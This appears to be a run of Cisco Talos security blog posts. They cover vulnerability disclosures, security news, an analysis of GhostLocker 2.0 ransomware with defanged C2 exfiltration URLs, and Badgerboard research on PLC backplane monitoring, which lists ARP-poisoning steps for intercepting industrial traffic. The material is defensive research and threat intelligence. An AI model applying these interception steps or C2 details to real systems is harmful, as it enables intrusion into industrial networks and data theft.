The other common argument that is brought to the table when discussing active security technology is the threat of false-positives. False-positives are just part of deploying security technology – nothing's perfect, and improper detection is going to happen. Organizations need to ask themselves, “Is it better to deal with occasional headaches of false-positives, or a really big headache when a breach happens?”
It's better to have this conversation with leadership now than after a major incident has occurred. Make sure to support your argument with hard data about the volume of alerts that are generated, the tasking associated with it, and the challenges of operating in today's landscape with one hand tied behind your back while fighting off skilled, determined adversaries. It's 2024 and running passive security is a recipe for disaster.
Cisco Talos has disclosed more than 30 vulnerabilities in February, including seven in Adobe Acrobat Reader, one of the most popular PDF editing and reading software currently available.
Adversaries could exploit these vulnerabilities to trigger the reuse of a previously freed object, thus causing memory corruption and potentially arbitrary code execution on the targeted machine.
Other potential code execution vulnerabilities are also present in Weston Embedded µC/HTTP-server, a web server component in Weston Embedded's in-house operating system and an open-source library that processes several types of potentially sensitive medical tests.
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
Multiple vulnerabilities in Adobe Acrobat Reader
Discovered by KPC of Cisco Talos.
Adobe Acrobat Reader contains multiple vulnerabilities that could lead to remote code execution if exploited correctly. Acrobat is known for being one of the most popular PDF readers available and allows users to fill out, edit and share PDFs.
TALOS-2023-1905 (CVE-2024-20735), TALOS-2023-1908 (CVE-2024-20747) and TALOS-2023-1910 (CVE-2024-20749) are all out-of-bounds read vulnerabilities that could lead to memory corruption, and eventually arbitrary code execution. TALOS-2023-1909 (CVE-2024-20748) also can lead to an out-of-bounds read, but in this case, could lead to the disclosure of sensitive information about the processes running in the software that could aid an adversary in the exploitation of other vulnerabilities or to bypass detection.
TALOS-2023-1901 (CVE-2024-20731), TALOS-2023-1890 (CVE-2024-20729) and TALOS-2023-1906 (CVE-2024-20730) can also lead to arbitrary code execution, but in this case, the vulnerability is caused by a buffer overflow.
An adversary can exploit all the aforementioned vulnerabilities by tricking the targeted user into opening a specially crafted PDF file. Usually, these come in the form of attachments or download links on phishing emails or other social engineering tactics.
Open-source library used in medical tests vulnerable to code execution
Discovered by Lilith >_>.
Talos researchers discovered multiple arbitrary code execution vulnerabilities in Libbiosig, an open-source library that processes various types of medical signal data, such as for tracking patient’s respiration levels, or measuring an electrocardiogram (ECG). The library produces the information in a way that is useable in different file formats.
An attacker could provide a specially crafted, malicious file to exploit TALOS-2024-1918 (CVE-2024-23305), TALOS-2024-1921 (CVE-2024-21812), TALOS-2024-1922 (CVE-2024-23313) and TALOS-2024-1925 (CVE-2024-23606), which causes an out-of-bounds write. An attacker could then leverage that to execute arbitrary code on the targeted device.
TALOS-2024-1920 (CVE-2024-21795) and TALOS-2024-1923 (CVE-2024-23310) work in the same way, but in this case, cause a heap-based buffer overflow and use-after-free condition, respectively.
Two other vulnerabilities, TALOS-2024-1917 (CVE-2024-22097) and TALOS-2024-1919 (CVE-2024-23809), are double-free vulnerabilities that can also lead to arbitrary code execution.
All the vulnerabilities Talos found in Libbiosig are considered critical, with a CVSS score of 9.8 out of 10.
Use-after-free vulnerability in Imaging Data Commons libdicom
Discovered by Dimitrios Tatsis.
A use-after-free vulnerability (TALOS-2024-1931/CVE CVE-2024-24793, CVE-2024-24794) exists in Imaging Data Commons libdicom, causing the premature freeing of memory that is used later.
Libdicom is a C library and a set of command-line tools for reading DICOM WSI files, commonly used in the medical field to store and transmit files. It’s commonly used in doctor’s offices, health systems and hospitals.
An adversary could exploit this vulnerability by forcing the targeted application to process a malicious DICOM image, potentially allowing them to later cause memory corruption on the application and possibly arbitrary code execution.
Arbitrary code execution, denial-of-service vulnerabilities in Weston Embedded server
Discovered by Kelly Patterson.
A critical heap-based buffer overflow vulnerability in the Weston Embedded uC-HTTP server could lead to arbitrary code execution. TALOS-2023-1843 (CVE-2023-45318) exists in the web server component of Weston’s uCOS real-time operating system.
The overflow occurs when parsing the protocol version of an HTTP request if the adversary sends a malicious packet to the targeted machine. TALOS-2023-1843 has a maximum severity score of 10.
The server also contains two other vulnerabilities — TALOS-2023-1828 (CVE-2023-39540, CVE-2023-39541) and TALOS-2023-1829 (CVE-2023-38562).
TALOS-2023-1828 is a double-free vulnerability, which could also lead to code execution, while TALOS-2023-1829 could allow an adversary to cause a denial of service on the targeted device.
5 heap-based buffer overflow vulnerabilities in implementation of LLaMA
Discovered by Francesco Benvenuto.
Talos discovered multiple heap-based buffer overflows in llama.cpp that could lead to code execution on the targeted machine.
LLaMA.cpp is a project written in C/C++ that provides inference for Large Language Models (LLMs). It supports a wide variety of hardware and platforms. Besides inference, it can also be used for quantizing models and provides Python bindings for simpler integration with more complex projects. For example, it can be used to create an AI assistant like ChatGPT. LLaMA.cpp also supports GGUF, a file format for storing LLMs that focuses on extensibility and compatibility.
LLaMA.cpp’s GitHub page says its goal is to provide users with an “LLM inference with minimal setup and state-of-the-art performance on a wide variety of hardware — locally and in the cloud.”
An adversary could exploit the following vulnerabilities if they provide a specially crafted .gguf file, the file type commonly used to store language models for inference: TALOS-2024-1912 (CVE-2024-21825), TALOS-2024-1913 (CVE-2024-23496), TALOS-2024-1914 (CVE-2024-21802), TALOS-2024-1915 (CVE-2024-21836) and TALOS-2024-1916 (CVE-2024-23605).
Apple released a new update for nearly all its devices that provides an all-new type of encryption for its iMessages to the point that, in theory, iMessages are now protected against attacks from quantum computers.
This is a little tricky because, as we’ve covered before, quantum computers don’t exist yet, and we don’t really know when they might.
Apple’s newest encryption technology, called PQ3, now secures iMessages with end-to-end encryption that is quantum-resistant. Signal, the secure messaging app of choice for many, launched quantum-resistant encryption for its service in September with its protocol called PQXDH.
In a blog post, Apple called this update the “most significant cryptographic security upgrade in iMessage history.”
To the average user, it’s probably tough to fully understand what this means. Private companies and governments are still pouring billions of dollars into developing quantum computers, and it’s more of a theory than a reality. We still don’t know a lot about quantum computing, and whether it could eventually be deployed in a scalable and responsible manner. The second one is created, though, it’s a safe bet that it’s going to fall into the wrong hands.
Having these protections in place now is a huge step toward the U.S. National Institutes of Standards and Technology’s goal of creating post-quantum encryption everywhere. But change, as we all know, is slow, and it’s too early to start celebrating the idea that we’re all safe from the downsides of quantum computing.
Eventually, every service, product, etc. that relies on public key infrastructure like SSL and TLS will need to re-examine how they operate and start integrating quantum-resistant algorithms. Think about how long it’s taken our network infrastructure to move from IPv4 to IPv6, and how IPv4 still routes most of today’s internet traffic.
Then, compare that to Apple and Signal, who get to roll out automatic updates to their users. It’s no guarantee that users are going to install these patches, but most will update their devices overnight without them even noticing, or they’ll just install the update to finally get the pop-up notifcation to go away. Others won’t have that same benefit.
Deploying PQC to a messaging app is easy enough, next we’ll have to hope that vendors who support web browsers, email clients, wireless routers AND those messaging apps are all on the same page so we can hopefully avoid overwhelming IT teams when we do enter the age of quantum computing.
The one big thing
Cisco Talos researchers have uncovered new details about the tooling and command and control servers used by the Turla APT. The infamous Russian state-sponsored actors was recently spotted spreading the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. Talos also discovered the use of three other malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting. One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.
Why do I care?
Turla is a well-known group that has most recently been seen targeting non-governmental organizations (NGOs) in Poland. Talos’ research found that Turla’s new backdoor code is different than its predecessors, which means defenders need to change up their detection methods, too. Our researchers partnered with Cert NGO, an incident response service in Poland, to disclose this information, so potential victims in Poland are now better protected and prepared for this activity.
So now what?
Talos has released new IOCs to provide defenders with new ways to block this actor. Turla also has tools for elevated process execution and credential harvesting, so ensuring that your organization utilizes the principle of least privilege can go a long way toward preventing these attacks.
Top security headlines of the week
The FBI and other international law enforcement agencies partnered to take down the LockBit ransomware gang’s leak site that it used to extort its victims. However, several days after the announcement, the group announced it was back online and launched what appears to be a new leak site. As part of the takedown effort, the agencies released new decryption software for victims of LockBit and arrested two suspected operators in Poland and Ukraine at the request of French authorities. The leak site’s page was replaced with information on the decryption key, press releases from the involved law enforcement agencies, charging documents and more. However, after the weekend, LockBit claimed it was back and invited affiliates to re-join its infrastructure. They even returned to extorting one of their current victims, Fulton County, Georgia. Representatives from the Fulton County government said on Monday that the group “re-established a site on the dark web and have once again listed Fulton County as one of their victims, with a renewed threat to release purportedly stolen data.” (CNN, SecurityWeek, WSB-TV)
Microsoft expanded its free logging services last week to now provide offerings for all U.S. federal agencies. The move comes after Chinese state-sponsored actors stole a Microsoft signing key and used it to spy on the emails of U.S. lawmakers last year. Previously, the company charged its cloud services customers extra for access to security logs that could have detected these types of intrusions. Now, they’re available for free. It’s also increasing the default log retention period from 90 days to 180 days (the minimum that Cisco Talos Incident Response has recommended in the past) for logs. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a statement that it worked with Microsoft, the Office of Management and Budget (OMB) and the Office of the National Cyber Director (ONCD) to roll this program out to select agencies over the past six months. CISA also released a new log management playbook for agencies that “provides further detail on each newly available log and how these logs can be used to support threat hunting and incident-response operations.” (CISA, CyberScoop)
U.S. President Joe Biden signed an executive order on Wednesday designed to keep U.S. citizens’ personal information from being sold to companies and organizations in Russia and China, two of the U.S.’s largest opponents in cyberspace. The executive order identified so-called “countries of concern” where U.S. firms could face punishments for selling personal information to, even if it was collected legitimately. However, the enforcement mechanisms for this must be created and installed, which could take months or longer. The Biden administration hopes to limit foreign entities or foreign-controlled companies that operated in the U.S. from improperly collecting sensitive data. This data includes things like biometrics, health data and geolocation. American lawmakers have long expressed concern that data sold by brokers or even stolen in cyber attacks could be used to spy or blackmail sensitive targets in the U.S., such as government officials and military leaders. Data brokers are legal in the U.S. They usually collect and categorize personal information on users, usually building profiles on them that can be sold to advertisers, social media companies, and more for personalized targeting. (Associated Press, Bloomberg)
To protect themselves during Russian aggression, the Ukrainian military utilizes electronic warfare to blanket critical infrastructure to defeat radar and GPS-guided smart munitions. This has the unintended consequence of disrupting GPS synchrophasor clock measurements and creating service outages on an already beleaguered and damaged transmission electric grid. Joe Marshall from Talos’ Strategic Communications team will tell an incredible story of how a group of engineers and security professionals from a diverse coalition of organizations came together to solve this electronic warfare GPS problem in an unconventional technical way, and helped stabilize parts of the transmission grid of Ukraine.
“Gotta Fly Now” is more closely associated with corporate hype videos or conferences with thousands of attendees in a mid-market city’s convention center than it is from its origins in the “Rocky” movies.
But Heather Couk thinks it’s useful in incident response calls, too.
Couk, an incident response commander with Cisco Talos Incident Response, says she jokingly threatens to play it in team meetings or on calls with clients to bring the energy up in the room (whether it be a virtual one or otherwise). The song inspires everyone to rally together in an environment that’s usually very stressful or coming on someone’s worst day of their professional career.
Her calm demeanor, optimism and love of the “Rocky” soundtrack are all things that Couk brings into each engagement with a Talos IR customer, whether they’re tackling an active ransomware engagement or just ready to sit down for a tabletop exercise to hone their emergency response plan.
“When you have someone on the other end of the phone, you don’t know the panic or the circumstances that they are working with. Everyone deals with stress and crisis in different ways,” she said. “The main thing to do is listen and make them feel comfortable. Once someone can convey all their emotions and thoughts, that can give you some sense of comfort.”
The personal side of Couk’s job in incident response mainly came with practice and repetition, but her interest in incident response and cybersecurity was initially fueled in the classroom.
Initially in high school, Couk said she was planning on graduating and majoring in psychology in college. But as she was working on a project for which she needed to design and print some pamphlets for another class, she connected with an IT teacher at her school who helped her over winter break.
After the project was over, Couk wrote a note to the teacher, thanking him for his assistance — something the teacher said he had never seen before. So, Couk ended up getting a small job with the teacher working on networking all the computers in her school’s district together, doing basic troubleshooting and working on the help desk for the project.
“That fueled my passion for computers,” Couk recalled.
She wound up double majoring in criminal justice and computer science at Missouri Southern State University. The bulk of her career was with a manufacturing company working as a security and email administrator, but she uses her criminal justice degree daily now with Talos IR helping to track down bad actors or helping customers understand adversaries’ motivation and tactics.
“I’m routinely on call, and when I’m on call, you have to be willing to change direction,” she said. “Sometimes you’ll get unique requests where you have to be creative in your approach.”
During her on-call time, Couk is addressing customer concerns as they come in, often helping in emergency response engagements and addressing a data breach or cyber attack in real-time. Other days, she’s conducting proactive services with customers, including testing their incident response plans in exercises, creating new plans from the ground up, and conducting other types of training for their IT teams.
While these can be very stressful environments, Couk says her team — and some inspirational music — help her stay on-task and focused.
“My team is always there to pick up for me if I miss something,” she said. “Everybody has each other’s backs. It’s just very refreshing, there’s not a lot of focus on ‘Let’s look at what you did wrong and try to fix that.’ Everybody tries to stay positive, and that goes a long way when you’re trying to keep your temperament cool, calm and collected.”
Also keeping her calm at home are her two dogs and a cat who she regularly enjoys taking outside for breaks throughout the day. Even just a five-minute walk around the block is enough for her to reset, Couk says, but for longer breaks, everyone goes out in the front yard for what her family jokingly calls “recess” with all the pets.
Couk also enjoys stepping back from the day-to-day emergency response of IR to look at broader attacker trends. She frequently participates in the Talos IR On Air streams recapping the past quarter’s data in Talos IR engagements and collecting the data for Talos’ accompanying reports.
In the coming year, she said she expects remote software to be a major focus for attackers, and a place that defenders need to be paying more attention to. Remote access software has become more popular since more workers went remote after the COVID-19 pandemic, but it also opens the door to adversaries to silently infiltrate targeted networks by just stealing one set of legitimate login credentials.
“Companies need to get a better handle on how those are used and deployed in the environment,” Couk said. “I’m always trying to stay abreast to all the latest threats, that way I’m aware of the opportunities to strengthen and harden customers’ environments.”
While it can be satisfying for Couk to stop an attacker in their tracks or lead a customer through an active event, she said it’s the ongoing relationships that make her feel most fulfilled in incident response. Repeated conversations and meetings with customers (and successfully helping them in any situation) builds trust over time, Couk says, and she can then benefit from that trust to help them act even faster the next time.
“I love it when we can predict what the adversary’s next action is going to be,” she said. “Then the customer trusts us, knows we’ve seen this before and been around, and it feels good to aid others and tell them what we’ve seen, so we can get it stopped faster the next time. It’s the classic ‘good vs. evil' battle.”
Cisco Talos observed a surge in GhostSec, a hacking group’s malicious activities since this past year.
GhostSec has evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware.
The GhostSec and Stormous ransomware groups are jointly conducting double extortion ransomware attacks on various business verticals in multiple countries.
GhostLocker and Stormous ransomware have started a new ransomware-as-a-service (RaaS) program STMX_GhostLocker, providing various options for their affiliates.
Talos also discovered two new tools in GhostSec arsenal, the “GhostSec Deep Scan tool” and “GhostPresser,” both likely being used in the attacks against websites.
Victimology of ransomware attacks
Talos observed the GhostSec and Stormous ransomware groups operating together to conduct several double extortion attacks using the GhostLocker and StormousX ransomware programs against the victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand and Indonesia according to our assessment of the disclosure messages posted by the group in their Telegram channels and Stormous ransomware data leak site.
The collaborative operation affected victims across various business verticals, according to disclosures made by the groups in their Telegram channels.
Talos’ observation in GhostSec’s Telegram channels highlighted the group’s continued attacks on Israel’s Industrial systems, critical infrastructure and technology companies. On Nov. 12, 2023, they claimed that the affected organizations also included the Ministry of Defense in Israel.
GhostSec has remained active since this past year
GhostSec is a hacker group that claims to be one of a modern-day Five Families group that includes ThreatSec, Stormous, Blackforums and SiegedSec on their Telegram channels. GhostSec is financially motivated, conducting single and double extortion attacks on victims across various geographies. They have also conducted several denial-of-service (DoS) attacks and have taken down victims’ websites, according to their Telegram channel messages. Their claims also showed us that their primary focus is raising funds for hacktivists and threat actors through their cybercriminal activities.
The actor’s name, GhostSec, resembles the well-known hacktivist Ghost Security Group, primarily focusing on counterterrorism efforts and targeting pro-ISIS websites. The Ghost Security Group mentioned in their blog that another hacking group mimics their identity.
In October 2023, GhostSec announced a new ransomware-as-a-service (RaaS) framework called GhostLocker. After their successful collaborative operations with the Stormous ransomware group in July 2023 against Cuban ministries, on Oct. 14, 2023, the Stormous gang announced that they would use the GhostLocker ransomware program in addition to their StormousX program.
Since then, the GhostSec and Stormous ransomware groups have jointly conducted double extortion ransomware attacks targeting victims across various business verticals in multiple countries. Along with the ransomware attacks, GhostSec seemed to be conducting attacks against corporate websites, including a national railway operator in Indonesia and one of Canada’s leading energy companies. They have likely leveraged their GhostPresser tool along with the cross-site scripting attack technique to compromise the websites.
On Feb. 24, 2024, Stormous group mentioned on “The Five Families” Telegram channel that they have started their new ransomware-as-a-service (RaaS) program “STMX_GhostLocker” along with their partners in GhostSec. The new program is made up of three categories of services for the affiliates: paid, free, and another for the individuals without a program who only want to sell or publish data on their blog (PYV service).
The group has shared their working model flow diagrams for member and non-member affiliates on their Telegram channels.
Stormous ransomware and GhostSec have rebuilt the new official blog of their RAAS program Stmx_GhostLocker on the TOR network, with features for the affiliates to join their program and disclose their victim’s data. Their blog dashboard shows the count of victims and disclosures of victims’ information with a link to their leaked data. They also display the largest ransom as $500,000 USD — we are not sure if that is the highest ransom payment they have received.
Evolution of GhostLocker 2.0 ransomware
In November 2023, GhostSec announced a newer version of their GhostLocker ransomware called GhostLocker 2.0. Recently we observed that they have again started advertising their latest Golang version “GhostLocker 2.0” by calling it “GhostLocker V2” and mentioning their ongoing work on the GhostLocker V3, indicating their continuous evolution in developing their toolset.
GhostLocker 2.0 encrypts the files on the victim’s machine using the file extension “.ghost” and drops and opens a ransom note. The ransom note has changed from its previous version, where the operator tells users to secure the encryption ID displayed in the ransom note and share it with them in their chat service during the negotiation by clicking “Click me.” The operator also mentions that the victim’s stolen data will be disclosed if they fail to contact them in seven days.
Ransom Note of GhostLocker (left) and ransom Note of GhostLocker 2.0 (right).
The GhostLocker RAAS has a C2 panel where the affiliates can get an overview of their attacks and gains. When deployed on the victim’s machine, the ransomware binaries will register to the C2 panel, and the affiliates can track the encryption status on the victim’s machine. Talos discovered the GhostLocker 2.0 C2 server with the IP address 94[.]103[.]91[.]246 located in Moscow, Russia. We observed that the geolocation of the C2 server is similar to that of the C2 servers of earlier versions of the GhostLocker ransomware that security researchers at Uptycs reported.
GhostLocker C2 panels.
GhostLocker RAAS provides its affiliates with the ransomware builder, which contains configuration options, including the mode of persistence that the ransomware binary can establish after being successfully run on the victim machine, target directories to encrypt, and techniques to evade the detections, such as killing the defined processes or services or running the arbitrary command to kill the scheduled task or bypass the User Account Controls (UAC).
Talos discovered the new variant of GhostLocker ransomware, “GhostLocker 2.0” in the wild on Nov. 15, 2023. The majority of the ransomware functionality of GhostLocker 2.0 remains the same as that of its earlier version GhostLocker, which was written in Python, excluding the watchdog component that the operator had used in earlier versions to start the dropped ransomware binary from the victim’s machine Windows Startup location and the AES encryption key length of 256 bits with that of 128 bits in the earlier version.
During the initial execution, GhostLocker 2.0 copies itself to the Windows Startup folder to establish persistence. It also generates a random string of 32 bytes and uses the generated string as the filename for its dropped copy in the Windows Startup folder.
After establishing the persistence, the ransomware establishes the connection to the C2 server through the URL hxxp[://]94[.]103[.]91[.]246[/]incrementLaunch.
After establishing a successful connection with the C2 server, the ransomware generates the secret key and the encryption ID and gathers the victim’s IP address, infection date and other information from its configuration parameters, including encryption status, ransom amount and a victim identifier string, to create a JSON file in the victim’s machine memory.
The generated JSON file is sent to the C2 server through the URL hxxp[://]94[.]103[.]91[.]246[/]addInfection to register the victim’s machine infection in the C2 panel.
After registering the victim’s machine infection with the C2 panel, the ransomware attempts to terminate the defined processes or services or Windows scheduled tasks from its configuration parameters in the victim’s machine to evade detection.
GhostLocker 2.0 searches for the target files on the victim’s machine according to the file extension list defined by the threat actor, and before the encryption routine starts, it will upload the target files to the C2 server through the URL “hxxp[://]94[.]103[.]91[.]246[/]upload” using HTTP post method. In the GhostLocker 2.0 sample we analyzed, the actor has configured the ransomware to exfiltrate and encrypt the files that have file extensions .doc, .docx, .xls and .xlsx.
After successfully exfiltrating, GhostLocker 2.0 encrypts the targeted files and appends “.ghost” as the file extension for the encrypted files. During the encryption process, GhostLocker 2.0 skips the “C:\Windows” folder. After completing the encryption routine, the ransomware drops the embedded ransom note to an HTML file with the filename “Ransomnote.html” on the victim’s desktop and launches it using the Windows `Start` command.
Other tools likely used to scan and compromise websites
Talos’ research uncovered two new tools in GhostSec’s arsenal that the hacking group claimed to have used in compromising legitimate websites. One of them is the “GhostSec Deep Scan toolset” to scan legitimate websites recursively, and another is a hack tool to perform cross-site scripting (XSS) attacks called “GhostPresser.”
GhostSec Deep Scan Tool
The GhostSec deep scan toolset is a Python utility that an attacker can use to scan the websites of their potential targets.
The tool has several modules to perform the following scans on the targeted websites:
Perform a user-specific search.
Scans multiple websites.
Extract the hyperlinks on the website.
Performs a deep scan and analyzes the technologies used to build the web page.
Scans the security protocols to detect the SSL/TLS and HSTS (HTTP Strict Transport Security).
Perform the website content analysis and extract the contents to a file.
Performs a WhoIs lookup.
Checks for the existence of any broken links in the website.
The tool also contains placeholders to perform specific functions including SSL analysis, DNS lookup, checks for robots.txt and sitemap.xml, CVE scans on the targeted website, and an advanced search based on the file type, date range and the custom criteria of the websites, indicating the GhostSec’s continuous evolution of tools in their arsenal.
One of the modules that stood out to us is the `deep_scan` function that the actor has defined to parse and scrape information from the targeted web pages and assess the technologies used in the web page. It is done by using the Python libraries Beautiful Soup, a Python package used for parsing data out of HTML and XML files, and the BuiltWith Python library, a Python package used to detect the technology used by a website, such as Apache, JQuery and WordPress.
GhostPresser: A WordPress hack tool
GhostPresser, an admin bypass and hacking tool targeting the WordPress content management system, is a shell script that GhostSec claims to have used in an XSS attack against a legitimate website in Canada. The tool appears to be under enhancement process as we spotted several placeholders in the tool to include functionalities to perform audits on the targeted websites. We are not sure at this moment about what type of audits the threat actor intends to implement in their tool.
A threat actor can achieve the following actions after successfully injecting the GhostPresser into a targeted website on WordPress.
Bypass logins and perform actions such as test cookies.
Activate and deactivate a plugin.
Change WordPress settings.
Create a new user.
Update WordPress core information.
Functions to install a new theme.
Below is an example of the function in the GhostPresser to install new themes in WordPress.
Coverage
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 62983-62989, and 300818-300820.
ClamAV detections are also available for this threat:
Win.Ransomware.GhostSec-10020906-0
Indicators of Compromise
Indicators of Compromise associated with this threat can be found here.
Analysis of the traffic between networked devices has always been of interest since devices could even communicate with one another.
As the complexity of networks grew, the more useful dedicated traffic analysis tools became. Major advancements have been made over the years with tools like Snort or Wireshark, but these tools are only useful when accurate information is provided to them. By only sending a subset of the information being passed across a network to monitoring tools, analysts will be provided with an incomplete picture of the state of their network.
This is a problem on nearly all the backplane networks to which most PLCs are attached. Oftentimes, the Ethernet traffic traversing the network can be captured and analyzed, but any non-standard or proprietary communication is often missed. This is the problem that we set out to address with Badgerboard, a new proof-of-concept tool designed to expose previously inaccessible backplane traffic and allow OT network operators to have a better understanding of the current state of their network.
Current state of visibility
Gaining visibility into the goings-on of a backplane network is not a new problem, nor is it impossible. It just requires some extra work to get beyond the easy-to-access information if a fuller picture of that network is desired.
Span ports
Many PLCs and their associated networking modules already contain an Ethernet port that can be configured as a span port for analysis of traffic on the backplane. The issue encountered here is that these span ports only provide visibility into the Ethernet traffic, which is not necessarily all of the device-to-device traffic occurring on the backplane.
WeaselBoard
In 2013, the Sandia National Laboratory released a technical report detailing their work on a project referred to as “WeaselBoard.” This was a physical module that would attach to a supported backplane to provide visibility into traffic that was otherwise not available for analysis. It boasted zero-day protection for PLCs mounted on the Allen Bradley ControlLogix 5000 Backplane and the S7-300 Backplane, accomplished by analyzing changes in the underlying system.
Before diving into the technical details of how Badgerboard came to be it seems pertinent to set the stage for both what this project is, and more importantly, what it is not.
Badgerboard was intended as a proof-of-concept research project to show that expanding the visibility of the backplane is feasible. Due to the nature of our day-to-day work, Badgerboard was never intended to be, and is not currently considered, a fully engineered solution, a generic solution, or even actively supported. We hope that this project will serve as a call to arms for customers to demand more advanced and more complete monitoring solutions from their vendors.
Modicon M580 and the X80 backplane
The Modicon M580 is the latest in Schneider Electric’s Modicon line of programmable automation controllers. The device contains a Wurldtech Achilles Level 2 certification and global policy controls to enforce various security configurations quickly. Communication with the device is possible over FTP, TFTP, HTTP, SNMP, EtherNet/IP, Modbus and a management protocol referred to as “UMAS.”
The X80 Backplane is the piece of hardware on which the Modicon M580 gets mounted, allowing for high-speed communication with other compatible modules.
We chose this setup for a couple of reasons: We were familiar with the controller and the associated EcoStruxure environment due to some prior work and this equipment provided a good baseline for top-end equipment at the time. It is important to note that the underlying issue addressed with Badgerboard is not unique to the M580 or Schneider Electric. This is an industry-wide issue that we are simply demonstrating on the chosen equipment due to availability and familiarity.
X80 backplane hardware analysis
The ports exposed by the backplane for modules are set up in pairs of receptacles, one for Ethernet communications and one for XBus communications.
When a module is placed onto the backplane, it can connect to either one or both of the available receptacles. In the case of the CPU module, both are connected. This plug on the backplane communications board matches nicely with the Molex 15922040 Plug, shown below.
Ethernet
Since the CPU module has an ethernet port, it can be used to determine the pins used for Ethernet.
CPU Module Analysis
The CPU module is made up of three parts: the external communications board (left), the processing board (right), and a backplane communications board (center). The external communications board and the processing board connect to the backplane communications board, which then connects directly to the backplane.
On the external communications board, there are three RJ-45 ports (shown in red) that each connect to a signal transformer (shown in yellow) followed by the switch chip (shown in purple), and finally, out to the backplane communications board through the wafer connector (shown in green).
When connected to the backplane communications board, ethernet traffic is connected to another signal transformer (shown in yellow) by traces that are not visible on the board. The signal transformer then connects to four pins (shown with red traces) on the bottom side of the plug (outlined in gray)
Signal transformer analysis
We determined the pinout by looking at the datasheet for the signal transformer. Since the transformer only supports 100Base-Tx communications, only four wires are necessary. Looking at the example application circuit, we see that the pins are mapped out as follows:
Determination of which wires to use can be found in the TIA/EIA-568 T568B termination pinout.
Pinout
Using this information, we can connect a standard Cat5e ethernet cable to the pins marked below and inspect traffic just like we were on any other Ethernet network.
Traffic analysis
Getting on the backplane network
Using the pinout discussed in the Hardware Analysis section above, it is possible to make a cable that connects to the backplane with the following steps:
Get an Ethernet cable wired to TIA/EIA-568 T568B.
Cut off one end and strip the casing to expose the twisted pairs.
Strip the casing for the green, white-green, orange, and white-orange wires.
Solder the wires as shown above.
Make sure the backplane is powered off.
Plug in the cable.
Power on the backplane.
Once physically connected, give yourself an IP in the 192.168.10.2-253 range. When successful, Wireshark should show (among other things) a ton of ARP traffic.
It is likely that, by default, there will be some network connectivity problems. This can be verified by attempting to ping 192.168.10.1. If the host is not accessible at that address, there is likely a VLAN conflict. A variation of the following commands will likely help: ifconfig eth0 0.0.0.0 up vconfig add eth0 1 ifconfig eth0.1 192.168.10.201/16 up
Intercepting traffic
Once on the network, it is possible to see Layer 2 traffic and anything destined for or originating from you. Since there isn't a span port (that we know about), an arp poisoning attack can be used to intercept traffic.
While connected to the backplane, do the following:
Start ettercap
Go to Sniff > Unified Sniffing and choose eth0.1 (or whatever interface you've configured)
Go to Hosts > Scan for hosts
This will populate a list of available targets to poison
Go to Hosts > Host List
Pick the desired targets and add them to BOTH Target1 and Target2
Go to Mitm > Arp Poisoning
Watch in Wireshark
XBus
Using one of these same plugs, it is possible to wire a method for extracting XBus communication via the backplane. Once on the bus, it is possible to see all the traffic being sent on that bus. This can be done with a logic analyzer, and once the traffic is intercepted, it is time to move on to analysis.
The Bus
Basic communication on the XBus requires the use of four important lines. They are broken out as follows:
Activation Pin
Must be pulled high for the port to be considered active and receive messages [Active High]
Control Pin
Slow messages that say who is talking on the bus, and likely what kind of message is next
RX Clock
This is the pin for the bus clock, any module can be driving the clock depending who is active on the bus at any given time [Active High]
RX Data
This is the pin for the bus data, any module can be driving the data depending who has claimed the bus at any given time [Active Low]
Activation pin
Once the pinout has been identified, it is fairly simple to start capturing traffic. The ACTIVE pin must be pulled high, ideally through a low-resistance resistor to not degrade the signal. In the image below, we are using a 470Ω pullup.
Control pin
The CONTROL traffic is always visible — even if the port is not considered active to the backplane — which can be an easy way to orient yourself to the provided pinout. This signal is significantly slower than the bus speed: These are presumably clocked at around 500 kHz, but more analysis needs to be done on these messages to determine their use.
The difficulty here is that these messages are most likely directly related to the physical network protocol and thus, are handled directly by the FPGAs that implement XBus. This makes it difficult, if not impossible, to track down any concrete definition of the purpose of these messages.
These control messages seem to be linked to the claiming/releasing of the shared bus and the device address that is claiming/releasing the bus. We specifically tested that some form of the address is sent in this message, but can't completely test for field size and all possibilities.
Receive clock
The RX_CLK is how all modules keep track of data being sent on the shared RX_DATA pin. This clock is driven by the currently active device and could change (although we have not seen it, this is always 12 MHz in our testing). This clock is shared with all of the active ports on the backplane.
There are a few important features of this clock that cause some design issues down the road but can also be leveraged for a unique solution. The clock is completely inactive when a module is not talking (seen at the end of the previous image). This inactivity means this clock is not great for clocking a hardware module (since it wouldn't run when the clock is inactive). The benefit of this is that it shows us hard message separations as the module will drive the clock to deactivate the clock before sending a new message. This can be seen here as the CONTROL line has no new messages sent, while the clock is very obviously deactivated for a time before reactivating and continuing to send data.
Another unique challenge of this clock is the high speed that it operates at, roughly 12 MHz which means dedicated hardware, and no use of slow communication protocols such as UART.
This high-speed clock drove a lot of the design constraints we had in the hardware implementation that will be discussed in later sections.
Receive data
